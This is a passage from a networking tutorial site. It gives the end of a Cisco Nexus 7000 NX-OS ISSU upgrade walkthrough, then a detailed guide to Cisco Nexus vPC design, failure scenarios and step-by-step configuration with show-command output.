[####################] 100% -- SUCCESS

Module 6:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 7:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 8:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[[####################] 100% -- SUCCESS

Module 9:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[####################] 100% -- SUCCESS

Module 10:  Upgrading bios/loader/bootrom.

Warning: please do not remove or power off the module at this time.

[[####################] 100% -- SUCCESS

,,,,

Module 6: Waiting for module online.

 -- SUCCESS

Notifying services about the switchover.

[####################] 100% -- SUCCESS

Module 6: <Sat Sep  8 12:59:40>

 Waiting for module online.

 -- SUCCESS

Module 1: <Sat Sep  8 13:08:54>

 Non-disruptive upgrading.

 -- SUCCESS

Module 2: <Sat Sep  8 13:10:48>

 Non-disruptive upgrading.

 -- SUCCESS

Module 3: <Sat Sep  8 13:12:43>

 Non-disruptive upgrading.

 -- SUCCESS

Module 4: <Sat Sep  8 13:14:38>

 Non-disruptive upgrading.

 -- SUCCESS

Module 7: <Sat Sep  8 13:16:36>

 Non-disruptive upgrading.

 -- SUCCESS

Module 8: <Sat Sep  8 13:18:34>

 Non-disruptive upgrading.

 -- SUCCESS

Module 9: <Sat Sep  8 13:20:30>

 Non-disruptive upgrading.

 -- SUCCESS

Module 10: <Sat Sep  8 13:22:29>

 Non-disruptive upgrading.

 -- SUCCESS

Module 6: <Sat Sep  8 13:24:25>

 Upgrading CMP image.

Warning: please do not reload or power cycle CMP module at this time.

 -- SUCCESS

Module 5: <Sat Sep  8 13:29:26>

 Upgrading CMP image.

Warning: please do not reload or power cycle CMP module at this time.

 -- SUCCESS

<Sat Sep  8 13:35:17>

 Recommended action::

"Please reload CMP(s) manually to have it run in the newer version.".

Install has been successful.

Nexus Upgrade Verification – Supervisor Engines and Modules

Once the installation is complete, a simple show version will verify the Nexus switch operating system has been upgraded:

NEXUS_7000# show version
Cisco Nexus Operating System (NX-OS) Software
TAC support: http://www.cisco.com/tac
Documents: http://www.cisco.com/en/US/products/ps9372/tsd_products_support_series_home.html
Copyright (c) 2002-2018, Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained in this software are
owned by other third parties and used and distributed under
license. Certain components of this software are licensed under
the GNU General Public License (GPL) version 2.0 or the GNU
Lesser General Public License (LGPL) Version 2.1. A copy of each
such license is available at
http://www.opensource.org/licenses/gpl-2.0.php and
http://www.opensource.org/licenses/lgpl-2.1.php
Software
  BIOS:      version 3.22.0
  kickstart: version 6.2(20a)
  system:    version 6.2(20a)
  BIOS compile time:       02/20/10
  kickstart image file is: bootflash:///n7000-s1-kickstart.6.2.20a.bin
  kickstart compile time:  8/10/2018 12:00:00 [07/16/2018 16:23:37]
  system image file is:    bootflash:///n7000-s1-dk9.6.2.20a.bin
  system compile time:     8/10/2018 12:00:00 [07/16/2018 17:36:43]
<output omitted>

In addition, the show module command will provide detailed information on what modules are installed and their software version which should match the newly installed software:

NEXUS_7000# show module

Mod  Ports  Module-Type                         Model              Status

---  -----  ----------------------------------- ------------------ ----------

1    48     10/100/1000 Mbps Ethernet XL Module N7K-M148GT-11L     ok

2    48     10/100/1000 Mbps Ethernet XL Module N7K-M148GT-11L     ok

3    48     10/100/1000 Mbps Ethernet XL Module N7K-M148GT-11L     ok

4    48     1000 Mbps Optical Ethernet XL Modul N7K-M148GS-11L     ok

5    0      Supervisor Module-1X                N7K-SUP1           active *

6    0      Supervisor Module-1X                N7K-SUP1           ha-standby

7    32     10 Gbps Ethernet XL Module          N7K-M132XP-12L     ok

8    48     10/100/1000 Mbps Ethernet XL Module N7K-M148GT-11L     ok

9    32     10 Gbps Ethernet XL Module          N7K-M132XP-12L     ok

10   48     1000 Mbps Optical Ethernet XL Modul N7K-M148GS-11L     ok

Mod  Sw              Hw

---  --------------  ------

1    6.2(20a)        1.0    

2    6.2(20a)        1.0    

3    6.2(20a)        1.0    

4    6.2(20a)        1.1    

5    6.2(20a)        2.0    

6    6.2(20a)        2.0    

7    6.2(20a)        1.3    

8    6.2(20a)        1.0    

9    6.2(20a)        1.5    

10   6.2(20a)        1.5 

Finally, you can view the installation log using the show install all status command.

Summary

This article explained the importance of upgrading your Cisco Nexus 7000/7700 NX-OS operating system, what an ISSU (In-Service Software Upgrade) is, how ISSU works and the steps involved during the process.  We also talked about the purpose and role of the Nexus Kickstart image and Nexus System image and showed how to transfer an image to your Nexus 7000/7700 switch.

In addition, we touched on different methods to backup your Nexus configuration and perform the important configuration compatibility check, ISSU capability verification and test the upgrade process. We finally saw how the Nexus ISSU upgrade is performed along with the upgrade verification process which includes supervisor engines and modules installed.

  • Hits: 55217
The Complete Cisco Nexus vPC Guide

The Complete Cisco Nexus vPC Guide. Features & Advantages, Design Guidelines, Configuration, Failure Scenarios, Troubleshooting, VSS vs vPC

Cisco virtual Port Channel (vPC) is a virtualization technology, launched in 2009, which allows links that are physically connected to two different Cisco Nexus Series devices to appear as a single port channel to a third endpoint. The endpoint can be a switch, server, router or any other device such as Firewall or Load Balancers that support the link aggregation technology (EtherChannel). 

To correctly design and configure vPC one must have sound knowledge of the vPC architecture components (vPC Domain, vPC Peer, vPC Peer-Link, vPC Peer Keepalive Link, vPC Member Port, vPC Orphan Port etc) but also follow the recommended design guidelines for the vPC Peer Keepalive Link and vPC Peer-Link. Furthermore, understanding vPC failure scenarios such as vPC Peer-Link failure, vPC Peer Keepalive Link failure, vPC Peer Switch failure, vPC Dual Active or Split Brain failure will help plan ahead to minimise network service disruption in the event of a link or device failure.

All the above including verifying & troubleshooting vPC operation are covered extensively in this article making it the most comprehensive and complete Cisco Nexus vPC guide.

The diagram below clearly illustrates the differences in both logical and physical topology between a non-vPC deployment and a vPC deployment:

vPC Deployment Concept

vPC Deployment Concept

The Cisco Nexus vPC technology has been widely deployed and in particular by almost 95% of Cisco Data Centers based on information provided by the Cisco Live Berlin 2016. In addition, virtual Port Channel was introduced in NX-OS version 4.1(4) and is included in the base NX-OS software license. This technology is supported on the Nexus 900070005000 and 3000 Series.

Let's take a look at the vPC topics covered:

We must point out that basic knowledge of the Cisco NX-OS is recommended for this article. You can also refer to our Introduction to Nexus Family – Nexus OS vs Catalyst IOS for an introduction study on the Nexus Series switches family. Finally, a Quiz is included at the last section and we are waiting for your comments and answers!

Additional related articles:

vPC Feature Overview & Guidelines

The Nexus 9000, 7000, 5000 and 3000 series switches take port-channel functionality to the next level by enabling links connected to different devices to aggregate into a single, logical link. The peer switches run a control protocol that synchronizes the state of the port channel and maintains it. In particular, the vPC belongs to the Multichassis EtherChannel (MEC) family of technology and provides the following main technical benefits:

  • Eliminates Spanning Tree Protocol (STP) blocked ports
  • Uses all available uplink bandwidth
  • Allows dual-homed servers (dual uplinks) to operate in active-active mode
  • Provides fast convergence upon link or device failure
  • Offers dual active/active default gateways for servers
  • Maintains independent control planes
  • Simplifies Network Design

The following general guidelines and recommendations should be taken into account when deploying vPC technology at a Cisco Nexus Data Center:

  • The same type of Cisco Nexus switches must be used for vPC pairing. It is not possible to configure vPC on a pair of switches consisting of a Nexus 7000 series and a Nexus 5000 series switch. vPC is not possible between a Nexus 5000 and Nexus 5500 switches. 
  • The vPC peers must run the same NX-OS version except during the non-disruptive upgrade, that is, In-Service Software Upgrade (ISSU).
  • The vPC Peer-Link must consist of at least two 10G Ethernet ports in dedicated mode. Utilizing Ethernet ports from two different modules will improve the availability and redundancy should a module fail. Finally the use of 40G or 100G interfaces for vPC links will increase the bandwidth of the vPC Peer-Link.
  • vPC keepalive link must be separate from the vPC Peer-Link.
  • vPC can be configured in multiple VDCs, but the configuration is entirely independent. In particular, each VDC for the Nexus 7000 Series switches requires its own vPC peer and keepalive links and cannot be shared among the VDCs.
  • The maximum number of switches in a vPC domain is two.
  • The maximum number of vPC peers per switch or VDC is one.
  • When Static routing from a device to vPC peer switches with next hop, FHRP virtual IP is supported.
  • Dynamic routing adjacency from vPC peer switches to any Layer3 device connected on a vPC is not supported. It is recommended that routing adjacencies are established on separate routed links.
  • vPC member ports must be on the same line card type e.g. M2 type cards at each end.

vPC Architecture Components – vPC Peer, Peer-Link, Keepalive Link, Domain, Member Port, Orphan Port & Member

vPC architecture consists of the following components:

vPC Peer

This is the adjacent device, which is connected via the vPC Peer-link. A vPC setup consists of two Nexus devices in a pair. One acts as the Primary and the other as a Secondary, which allows other devices to connect to the two chassis using Multi-Channel Ethernet (MEC).

 cisco nexus vpc architecture components

vPC Architecture Components

vPC Peer-link

The vPC peer-link is the most important connectivity element in the vPC setup. This link is used to synchronize the state between vPC peer devices via vPC control packets which creates the illusion of a single control plane. In addition the vPC peer-link provides the necessary transport for multicast, broadcast, unknown unicast traffic and for the traffic of orphaned ports. Finally, in the case of a vPC device that is also a Layer 3 switch, the peer-link carries Hot Standby Router Protocol (HSRP) packets.

vPC Peer Keepalive Link

The Peer Keepalive Link provides a Layer 3 communications path that is used as a secondary test in order to determine whether the remote peer is operating properly. In particular, it helps the vPC switch to determine whether the peer link itself has failed or whether the vPC peer is down.  No data or synchronization traffic is sent over the vPC Peer Keepalive Link—only IP/UDP packets on port 3200 to indicate that the originating switch is operating and running vPC. The default timers are an interval of 1 second with a timeout of 5 seconds.

vPC Domain

This is the common domain configured across two vPC peer devices and this value identifies the vPC. A vPC domain id per device is permitted.

vPC Member Port

This is the interface that is a member of one of the vPCs configured on the vPC peers.

Cisco Fabric Services (CFS)

This protocol is used for stateful synchronization and configuration.  It utilizes the peer link and does not require any configuration by the administrators. The Cisco Fabric Services over Ethernet protocol is used to perform compatibility checks in order to validate the compatibility of vPC member ports to form the channel, to synchronize the IGMP snooping status, to monitor the status of the vPC member ports, and to synchronize the Address Resolution Protocol (ARP) table.

Orphan Device

This is a device that is on a VPC VLAN but only connected to one VPC peer and not to both.

Orphan Port

An orphan port is an interface that connects to an orphan device vPC VLAN.

non-vPC VLAN

Any of the STP VLANs not carried over the peer-link.

Virtual Port Channel (vPC - Nexus) vs Virtual Switching System (VSS - Catalyst)

Virtual Switching System (VSS) is a virtualization technology that pools multiple Cisco Catalyst Switches into one virtual switch, increasing operational efficiency, boosting nonstop communications, and scaling system bandwidth capacity. VSS was first available in the Cisco 6500 series and was later introduced to the Cisco 4500,  the newer 4500X, 6800 Series switches and the Catalyst 3850 (April 2017 onwards).

The vPC feature is currently not supported by any Cisco Catalyst Series Switches and is available only on the Nexus switches family.

While VSS makes use of Multi Ether Channel (MEC) to bond Cisco Catalyst Series switches together, vPC is used on Cisco Nexus Series switches for the same purpose. Both technologies are similar from the perspective of the downstream switch but there are differences, mainly in that the control plane works on the upstream devices. The next table summarizes the main characteristics and features of the VSS and vPC technologies:

Feature

VSS

vPC

Multi-Chassis Port Channel

Yes

Yes

Loop Free Topology

Yes

Yes

Spanning Tree as failsafe protocol

Yes

Yes

Maximum physical Nodes

2

2

No Disruptive ISSU support

No

Yes

Control Plane

Single logical node

Two independents active nodes

Layer 3 port channel

YES

Limited 

Configuration

Common configuration

Two different configurations

Etherchannel

Static, PAgP, PAgP, LACP

Static, LACP

Table 1. Comparing Catalyst VSS with Nexus vPC

Deploying MEC or vPC could require minimal changes to an existing switching infrastructure. Catalyst Switches may need a supervisor engine upgrade to form a VSS. Then, the primary loop avoidance mechanism is provided by MEC or vPC control protocols. STP is still in operation but is running only as a failsafe mechanism. Finally, the devices e.g. access switches, servers, etc., should be connected with multiple links to Data Center Distribution or Core switches. Link Aggregation Control Protocol (LACP) is the protocol that allows for dynamic portchannel negotiation and allows up to 16 physical interfaces to become members of a single port channel.

vPC Peer Keepalive Link Design Guidelines

Taking into account the importance and impact of the Peer Keepalive link and vPC Peer-Link, Cisco recommends the following type of interconnections for the vPC Keepalive link:

Recommendations in order of preference for the vPC Keepalive link interconnection

Nexus 7000 & 9000 Series Switches

Nexus 5000 & 3000 Series Switches

1. Dedicated link(s) (1GE LC)

1. mgmt0 interface (along with management traffic)

2. mgmt0 interface  (along with management traffic)

2. Dedicated link(s) (1/10GE front panel ports)

3. As last resort, can be routed in-band over the L3 infrastructure

Table 2. vPC Keepalive Link Interconnection methods

Special attention is needed where the mgmt interfaces of a Nexus are used to route the vPC keepalive packets via an Out of Band (OOB) Management switch. Turning off the OOB Management switch, or removing by accident the keepalive links from this switch in parallel with vPC Peer-Link failure, could lead to split brain scenario and network outage.

Using a dedicated interface for vPC keepalive link has the advantage that there’s no other network device that could affect the vPC keepalive link. Using point to point links makes it easier to control the path and minimizes the risk of failure. However, an interface for each vPC peer switch should be used to host the keepalive link. This could be a problem where there’s a limited number of available interfaces or SFPs.

Layer 3 connectivity for the Keepalive Link can be accomplished either with the SVI or with L3 (no switchport) configuration of the interfaces involved. The SVI configuration is the only option where the Nexus vPC Peer switches do not support L3 features. In any case, it is recommended to set the Keepalive Link to a separate VRF in order to isolate it from the default VRF.  If the SVI is configured to route the keepalive packets, then this vlan should not be routed over vPC link. This is why the Keepalive VLAN should be removed from the trunk allowed list of the vPC Peer-Link or the vPC member ports. Allowing the Keepalive VLAN over the vPC peer trunk could lead to split brain scenario (analyzed below) and network outage if the vPC Peer-Link fails!

vPC Peer-Link Design Guidelines

The following design guidelines are recommended for the vPC Peer-Links:

  • Member ports must be at least 10GE interfaces.
  • Use only point-to-point without other devices between the vPC peers (Nexus switches). E.g. transceivers, microwave bridge link, etc.
  • Use at least two 10Gbps links spread between two separate I/O module cards at each switch for best resiliency.
  • The ports should be in dedicated mode for the oversubscribed modules.
  • vPC Peer-Link ports should be located on a different I/O module than that used by the Peer Keepalive Link.

The next section describes how the vPC Nexus switches interact with events triggered by failure of links (vPC Peer Keepalive Link, Peer-Link etc) or vPC Peer switch.

vPC Failure Scenario: vPC Peer-Link Failure

In the scenario the vPC Peer-Links on the Secondary Nexus fail the status of the peer vPC is examined using the Peer Keepalive Link:

 cisco nexus vpc peer link failure

vPC Peer-Link Failure Scenario

If both vPC peers are active, the secondary vPC (i.e. the switch with the higher priority) disables all the vPC member ports to avoid uncertain traffic behavior and network loops which can result in service disruption.

At this point traffic continues flowing through the Primary vPC without any disruptions.

In the unfortunate event there is an orphan device connected to the secondary peer, then its traffic will be black-holed.

vPC Failure Scenario: vPC Peer Keepalive Link Failure

In the event the Peer Keepalive Link fails it will not have a negative effect on the operation of the vPC, which will continue forwarding traffic. The Keepalive Link is used as a secondary test mechanism to confirm the vPC peer is live in case the Peer-Link goes down:

 cisco nexus vpc peer keepalive link failure

vPC Peer Keepalive Link Failure Scenario

During a Keepalive Link failure there is no change of roles between the vPC (primary/secondary) and no down time in the network.

As soon as the Keepalive Link is restored the vPC will continue to operate.

vPC Failure Scenario: vPC Peer Switch Failure

In the case of a vPC peer switch total failure, the remote switch learns from the failure via the Peer Keepalive link since no keepalive messages are received. The data traffic is forwarded by utilizing the remaining links til the failed switch recovers. It should be noticed that the Keepalive messages are used only when all the links in the Peer-Link fail:

 cisco nexus vpc peer switch failure

vPC Peer Switch Failure Scenario

Spanning Tree Protocol is used as a loop prevention mechanism in the case of a Peer Keepalive Link and vPC Peer-Link simultaneous failure.

vPC Failure Scenario: Dual Active or Split Brain

The Dual-Active or Split Brain vPC failure scenario occurs when the Peer Keepalive Link fails followed by the Peer-Link. Under this condition both switches undertake the vPC primary roles.

If this happens, the vPC primary switch will remain as the primary and the vPC secondary switch will become operational primary causing severe network instability and outage:

cisco nexus vpc failure dual active split brain 

vPC Dual-Active or Split Brain Failure Scenario

Nexus vPC Configuration & Troubleshooting Guide

The vPC is configured and normal operation is verified by following the nine steps defined below. It should be noted that the order of the vPC configuration is important and that a basic vPC setup is established by using the first 4 steps:

 cisco nexus vpc configuration steps

vPC Configuration Steps

Step 1: Enable the vPC feature and configure the vPC domain ID on both Nexus switches.

Step 2: Select a Peer Keepalive deployment option.

Step 3: Establish the vPC peer keepalive link.

Step 4: Configure the vPC Peer-Link.

Step 4 completes the global vPC configuration on both vPC peer switches.

Step 5: Configure individual vPCs to downstream switches or devices.

Step 6: Optionally, enable the peer gateway feature to modify the First Hop Redundancy Protocol (FHRP) operation.

Step 7: Optionally, enable the peer switch feature to optimize the STP behaviour with vPCs.

Step 8: Optionally, enable the additional features to optimize the vPCs setup.

Step 9: Optionally, verify operation of the vPC and vPC consistency parameters.

Cisco Nexus vPC Configuration Example

To help illustrate the setup of the vPC technology we used two Nexus 5548 data center switches.  Typically, a similar process would be followed for any other type of Nexus switches.

Our two Nexus 5548 were given hostnames N5k-Primary & N5k-Secondary and the order outlined above was followed for the vPC setup and configuration:

Step 1: Enable the vPC Feature and Configure the vPC Domain ID on Both Switches

Following are the commands used to enable vPC and configure the vPC domain ID on the first switch:

N5k-Primary(config)# feature vpc

N5k-Primary(config)# vpc domain 1

N5k-Primary(config-vpc-domain)# show vpc role

vPC Role status

----------------------------------------------------

vPC role                        : none established             

Dual Active Detection Status    : 0

vPC system-mac                  : 00:23:04:ee:be:01             

vPC system-priority             : 32667

vPC local system-mac            : 8c:60:4f:2c:b3:01            

vPC local role-priority         : 0  

Now we configure the Nexus Secondary switch using the same commands:

N5k-Secondary(config)# feature vpc

N5k-Secondary(config)# vpc domain 1

N5k-Secondary(config-vpc-domain)# show vpc role

vPC Role status

----------------------------------------------------

vPC role                        : none established             

Dual Active Detection Status    : 0

vPC system-mac                  : 00:23:04:ee:be:01            

vPC system-priority             : 32667

vPC local system-mac            : 8c:60:4f:aa:c2:3c            

vPC local role-priority         : 0  

The same domain ID (ID 1 in our example) must be used on both vPC peer switches in the vPC domain. The output of the show vpc role command shows that the system MAC address is derived from the vPC domain ID, which is equal to 01.

Step 2: Choose a Peer Keepalive Deployment Option

Our setup below utilizes the SVI technology and the second option (dedicated 1G link) proposed for the N5k series switches keepalive link setup (table 2). This deployment option involves a dedicated VLAN with a configured SVI used for the keepalive link within an isolated VRF (named keepalive) for complete isolation from the rest of the network. Interface Ethernet 1/32 is used by both switches as a dedicated interface for the keepalive link.

On the first switch we create VLAN 23 with an SVI (assign an IP address to the VLAN interface) and make it a member of the VRF instance created for this purpose. We complete the configuration by assigning Ethernet 1/32 to VLAN 23:

N5k-Primary(config)# vlan 23

N5k-Primary(config-vlan)# name keepalive

N5k-Primary(config)# vrf context keepalive

interface Vlan23

  vrf member keepalive

  ip address 192.168.1.1/24

interface Ethernet1/32

  switchport access vlan 23

  speed 1000

  duplex full

We follow the same configuration steps on our Secondary Nexus switch:

N5k-Secondary (config)# vlan 23

N5k-Secondary(config-vlan)# name keepalive

N5k-Secondary(config)# vrf context keepalive

 

interface Vlan23

  vrf member keepalive

  ip address 192.168.1.2/24

 

interface Ethernet1/32

  switchport access vlan 23

  speed 1000

  duplex full

The ping connectivity test between the Peer Keepalive Links is successful:

N5k-Secondary# ping 192.168.1.1 vrf keepalive

PING 192.168.1.1 (192.168.1.1): 56 data bytes

36 bytes from 192.168.1.2: Destination Host Unreachable

Request 0 timed out

64 bytes from 192.168.1.1: icmp_seq=1 ttl=254 time=3.91 ms

64 bytes from 192.168.1.1: icmp_seq=2 ttl=254 time=3.05 ms

64 bytes from 192.168.1.1: icmp_seq=3 ttl=254 time=1.523 ms

64 bytes from 192.168.1.1: icmp_seq=4 ttl=254 time=1.501 ms

Note: The initial ICMP timeout is normal behavior as the switch needs to initially send out an ARP request to obtain 192.168.1.1’s MAC address and then send the ICMP (ping) packet.

Step 3: Establish the vPC Peer Keepalive Link

By default, the vPC Peer Keepalive packets are routed in the management VRF and use the Out-Of-Band (OOB) mgmt interface.

It is, however, highly recommended to configure the vPC Peer Keepalive link to use a separate VRF instance to ensure that the peer keepalive traffic is always carried on that link and never on the Peer-Link. In addition,  the keepalive vlan should be removed from the trunk allowed list of the vPC Peer-Link or the vPC Member Ports.

N5k-Primary(config)# vpc domain 1

N5k-Primary (config-vpc-domain)# peer-keepalive destination 192.168.1.2 source 192.168.1.1 vrf keepalive

Configuration of the Secondary vPC follows:

N5k-Secondary(config)# vpc domain 1

N5k-Secondary(config-vpc-domain)# peer-keepalive destination 192.168.1.1 source 192.168.1.2 vrf keepalive

We can verify the status of the vPC Peer Keepalive Link using the show vpc peer-keepalive command on both switches:

N5k-Primary# show vpc peer-keepalive

vPC keep-alive status           : peer is alive                

--Peer is alive for             : (95) seconds, (201) msec

--Send status                   : Success

--Last send at                  : 2017.06.22 23:03:50 720 ms

--Sent on interface             : Vlan23

--Receive status                : Success

--Last receive at               : 2017.06.22 23:03:50 828 ms

--Received on interface         : Vlan23

--Last update from peer         : (0) seconds, (201) msec

vPC Keep-alive parameters

--Destination                   : 192.168.1.2

--Keepalive interval            : 1000 msec

--Keepalive timeout             : 5 seconds

--Keepalive hold timeout        : 3 seconds

--Keepalive vrf                 : keepalive

--Keepalive udp port            : 3200

--Keepalive tos                 : 192

Verifying the status of the vPC Peer Keepalive Link on our Secondary switch:

N5k-Secondary# show vpc peer-keepalive

vPC keep-alive status           : peer is alive                

--Peer is alive for             : (106) seconds, (385) msec

--Send status                   : Success

--Last send at                  : 2017.06.22 22:46:32 106 ms

--Sent on interface             : Vlan23

--Receive status                : Success

--Last receive at               : 2017.06.22 22:46:32 5 ms

--Received on interface         : Vlan23

--Last update from peer         : (0) seconds, (333) msec

vPC Keep-alive parameters

--Destination                   : 192.168.1.1

--Keepalive interval            : 1000 msec

--Keepalive timeout             : 5 seconds

--Keepalive hold timeout        : 3 seconds

--Keepalive vrf                 : keepalive

--Keepalive udp port            : 3200

--Keepalive tos                 : 192

Step 4: Configure the vPC Peer-Link

This step completes the global vPC configuration on both vPC peer switches and involves the creation of the Port-Channel to be used as the vPC Peer-Link.

First we need to enable the lacp feature then create our high-capacity port channel between the two switches to carry all necessary traffic.

The interfaces Eth1/2 and Eth1/3 are selected to become members of the vPC Peer-Link in LACP mode. In addition, the vPC is configured as a trunk. The allowed VLAN list for the trunk should be configured in such a way that only vPC VLANs (VLANs that are present on any vPCs) are allowed on the trunk. VLAN 10 has been created and allowed on the vPC Peer-Link:

N5k-Primary (config)# feature lacp

N5k-Primary(config)# interface ethernet 1/2-3

N5k-Primary(config-if-range)# description *** VPC PEER LINKS ***

N5k-Primary(config-if-range)# channel-group 23 mode active

N5k-Primary(config)# vlan 10

N5k-Primary(config)# interface port-channel 23

N5k-Primary(config-if)# description *** VPC PEER LINKS ***

N5k-Primary(config-if)# switchport mode trunk

N5k-Primary(config-if)# switchport trunk allowed vlan 10

N5k-Primary(config-if)# vpc peer-link

Please note that spanning tree port type is changed to "network" port type on vPC peer-link. This will enable spanning tree Bridge Assurance on vPC peer-link provided the STP Bridge Assurance(which is enabled by default) is not disabled.

N5k-Primary(config-if)# spanning-tree port type network 

An identical configuration follows for our Secondary switch:

N5k-Secondary(config)# feature lacp

N5k-Seondary(config)# interface ethernet 1/2-3

N5k-Secondary(config-if-range)# description *** VPC PEER LINKS ***

N5k-Secondary(config-if-range)# channel-group 23 mode active

N5k-Seondary(config)# vlan 10

N5k-Secondary(config)# interface port-channel 23

N5k-Secondary(config-if)# description *** VPC PEER LINKS ***

N5k-Secondary(config-if)# switchport mode trunk

N5k-Secondary(config-if)# switchport trunk allowed vlan 10

N5k-Secondary(config-if)# vpc peer-link

Please note that spanning tree port type is changed to "network" port type on vPC peer-link. This will enable spanning tree Bridge Assurance on vPC peer-link provided the STP Bridge Assurance (which is enabled by default) is not disabled

N5k-Secondary(config-if)# spanning-tree port type network

It is not recommended to carry non-vPC VLANs on the vPC Peer-Link, because this configuration could cause severe traffic disruption for the non-vPC VLANs if the vPC Peer-Link fails. Finally, the vPC Peer Keepalive messages should not be routed over the vPC Peer-Link, which is why the VLAN associated with the Peer Keepalive connection (VLAN 23) is not allowed on the vPC Peer-Link.

We can perform a final check on our vPC using the show vpc command:

N5k-Primary# show vpc

Legend:

                (*) - local vPC is down, forwarding via vPC peer-link

vPC domain id                     : 1  

Peer status                       : peer adjacency formed ok     

vPC keep-alive status             : peer is alive                

Configuration consistency status  : success

Per-vlan consistency status       : success                      

Type-2 consistency status         : success

vPC role                          : primary

Number of vPCs configured         : 0  

Peer Gateway                      : Disabled

Dual-active excluded VLANs        : -

Graceful Consistency Check        : Enabled

Auto-recovery status              : Enabled (timeout = 240 seconds)

vPC Peer-link status

---------------------------------------------------------------------

id   Port   Status Active vlans   

--   ----   ------ --------------------------------------------------

1    Po23   up     10

Verifying the vPC on the Secondary peer:

N5k-Secondary# show vpc

Legend:

                (*) - local vPC is down, forwarding via vPC peer-link

vPC domain id                     : 1  

Peer status                       : peer adjacency formed ok     

vPC keep-alive status             : peer is alive                

Configuration consistency status  : success

Per-vlan consistency status       : success                      

Type-2 consistency status         : success

vPC role                          : secondary, operational primary

Number of vPCs configured         : 0  

Peer Gateway                      : Disabled

Dual-active excluded VLANs        : -

Graceful Consistency Check        : Enabled

Auto-recovery status              : Enabled (timeout = 240 seconds)

vPC Peer-link status

---------------------------------------------------------------------

id   Port   Status Active vlans   

--   ----   ------ --------------------------------------------------

1    Po23   up     10

The show vpc output shows that the vPC Peer-Link has been successfully established between the Nexus 5548 switches.

Step 5: Configure Individual vPCs to Downstream Devices

Individual vPCs can now be configured since the vPC domain has been properly established in the previous step.

Individual vPCs are used to connect network devices to both data center switches. For example, a router or server can connect with two or more network interfaces to both switches simultaneously for increased redundancy and bandwidth availability.

For each individual vPC, a port channel is configured on both vPC peer switches. The two port channels are then associated with each other by assigning a vPC number to the port channel interfaces:

interface Ethernet1/1

  description *** Connected to ISR Gig0/2/4 ***

  switchport access vlan 10

  speed 1000

  channel-group 10

interface port-channel10

  switchport access vlan 10

  vpc 10

In our setup, vpc index 10 has been assigned to port-channel 10. It is generally good practice to keep the port-channel (e.g. port-channel 10) and vpc index  (e.g. vpc 10) the same to make tracking easier and avoid configuration mistakes.

Finally the vPC port number (e.g. port-channel 10) to the downstream device (e.g router) is unique for each individual vPC within the vPC domain and must be identical between the two peer switches as shown in the diagram below:

 cisco nexus vpc downstream devices config

Nexus vPC port-channel configuration to downstream devices

Finally the vPC member ports should have a compatible and consistent configuration for all the ports to both switches. Here is the configuration on the Primary Nexus switch:

interface Ethernet1/1

  description *** Connected to ISR Gig0/2/0 ***

  switchport access vlan 10

  speed 1000

  channel-group 10

interface port-channel10

  switchport access vlan 10

  vpc 10

Verifiying our vPC to the downstream device from the Primary vPC:

N5k-Primary# show vpc | begin "vPC status"

vPC status

----------------------------------------------------------------------------

id     Port        Status  Consistency  Reason                    Active vlans

------ ----------- ------ ----------- -------------------------- -----------

10     Po10        up     success     success                    10          

Verifiying our vPC to the downstream device from the Secondary vPC:

N5k-Secondary# show vpc | begin "vPC status"

vPC status

----------------------------------------------------------------------------

id     Port        Status Consistency Reason                     Active vlans

------ ----------- ------ ----------- -------------------------- -----------

10     Po10        up     success     success                    10         

Step 6: (Optional) Enable the Peer-Gateway Feature to Modify the FHRP Operation

The vPC Peer-Gateway feature causes a vPC peer to act as a gateway for packets that are destined for the peer device’s MAC address. So, it enables local forwarding of such packets without the need to cross the vPC Peer-Link. This feature optimizes the use of the peer link and avoids potential traffic loss in FHRP scenarios.

When enabled, the peer gateway feature must be configured on both primary and secondary vPC peers:

N5k-Primary(config)# vpc domain 1

N5k-Primary(config-vpc-domain)# peer-gateway

Configuring the secondary vPC peer:

N5k-Secondary(config)# vpc domain 1

N5k-Secondary(config-vpc-domain)# peer-gateway

Step 7: (Optional) Enable the Peer-Switch Feature to Optimize the STP Behaviour with the vPCs

This feature allows a pair of Cisco Nexus switches to appear as a single spanning tree root in the Layer 2 topology. It eliminates the need to pin the spanning tree root to the vPC primary switch and improves vPC convergence if the vPC primary switch fails:

N5k-Primary(config)# vpc domain 1

N5k-Primary(config-vpc-domain)# peer-switch

Configuring the peer-switch command on the Secondary vPC:

N5k-Secondary(config)# vpc domain 1

N5k-Secondary(config-vpc-domain)# peer-switch

Step 8: (Optional) Optimize vPC performance: ‘ip arp synchronize’, ‘delay restore’, ‘auto-recovery’, ‘graceful consistency-check’ & ‘role priority’ commands

Configure the following vPC commands in the vPC domain configuration mode, this will increase resiliency, optimize performance, and reduce disruptions in vPC operations.

The ip arp synchronize feature allows the synchronization of the ARP table when the peer-link comes up. The vPC offers the option to delay the restoration of the vPC ports for a configurable time by using the delay restore command, which is useful to avoid traffic blackholing after a reboot of the switch. The auto-recovery command has a default timer of 240 seconds.

In addition, it is recommended to use the configuration synchronization graceful consistency-check feature to minimize disruption when a Type 1 mismatch occurs. Examples of Type 1 mismatches could be the STP mode or the STP port type between the vPC peer switches. The show vpc consistency-parameters global output illustrates the Type 1 and Type 2 parameters of a vPC.

The commands below enable and configure all the above mentioned features:

N5k-Primary(config)# vpc domain 1

N5k-Primary(config-vpc-domain)# delay restore 360

N5k-Primary(config-vpc-domain)# auto-recovery

Warning:

Enables restoring of vPCs in a peer-detached state after reload, will wait for 240 seconds to determine if peer is un-reachable

N5k-Primary(config-vpc-domain)# graceful consistency-check

N5k-Primary(config-vpc-domain)# ip arp synchronize

Once the Primary switch is configured we apply the same configuration to the Secondary switch:

N5k-Secondary(config)# vpc domain 1

N5k-Secondary(config-vpc-domain)# delay restore 360

N5k-Secondary(config-vpc-domain)# auto-recovery

Warning:

Enables restoring of vPCs in a peer-detached state after reload, will wait for 240 seconds to determine if peer is un-reachable

N5k-Secondary(config-vpc-domain)# graceful consistency-check

N5k-Secondary(config-vpc-domain)# ip arp synchronize

Finally, it should be noted that it is feasible to set the role priority under vpc domain configuration with the command role priority to affect the election of the primary vPC switch.

The default role priority value is 32,667 and the switch with lowest priority is elected as the vPC primary switch.

